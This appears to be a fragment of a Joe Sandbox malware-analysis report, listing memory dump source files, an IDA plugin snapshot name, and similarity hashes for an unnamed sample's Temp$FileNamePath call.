                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                          • String ID: aut
                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                          • Opcode ID: 990b6c71224d04ecd0c05924a8f433ac6da0d7e59926ee093412582f4e28e4f0
                                                                                                                                                          • Instruction ID: 8e8d8cf80b45a8d642fffe68fd584a10b07410bb7b35170942414d933f3f8b83
                                                                                                                                                          • Opcode Fuzzy Hash: 990b6c71224d04ecd0c05924a8f433ac6da0d7e59926ee093412582f4e28e4f0
                                                                                                                                                          • Instruction Fuzzy Hash: 43D05EB154030EBBDB10ABA0ED0EF99776CA700709F1041927615D14D1D7B0D685CBA1